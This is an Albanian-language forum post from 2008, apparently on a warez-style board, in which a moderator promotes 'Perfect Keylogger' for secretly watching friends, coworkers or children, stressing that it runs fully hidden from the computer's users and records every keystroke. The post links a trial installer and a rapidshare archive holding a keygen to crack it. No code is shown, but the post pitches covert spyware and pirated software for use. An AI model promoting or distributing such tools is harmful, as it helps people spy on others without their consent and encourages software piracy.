Forum.: | PortaL |:.GalleryPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Perfect KeYlogger

Shko poshtë 
AutoriMesazh
Go0s3
Super/Moderator
Super/Moderator
Go0s3

Numri i postimeve : 64
Age : 27
Vendi : En Pc
Registration date : 26/09/2008

MesazhTitulli: Perfect KeYlogger   Mon Sep 29, 2008 11:42 pmPerkthimi shqip:
Doni të dini se ç'farë bën miku yt ose punëtorët e korporatës në linjë? Ose ndoshta dëshironi të kontrolloni fëmijët tuaj ose keni dyshime se ç'farë ata bëjnë në kompjuter? Me Perfect Keylogger është e mundur për dy minuta! Κy program ekzekutohet në kompjuterin e instaluar,komplet i fshehur nga përdoruesit e tij, dhe shkruan çdo gjë që shtypet në një skedar të mbrojtur. Instalo Perfect Keylogger dhe merrni kontrollin total e PC-së.

Download Perfect keYlogger
[hide]
CODE
http://www.remote-logger.com/downloads/i_bpk_trial.exe

Keygen by Team Uare
[hide]
CODE
rapidshare.com summer2008.zip.html

..::JU PERSHENDES::..
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Perfect KeYlogger
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Partners :: WebSites-
Kërce tek: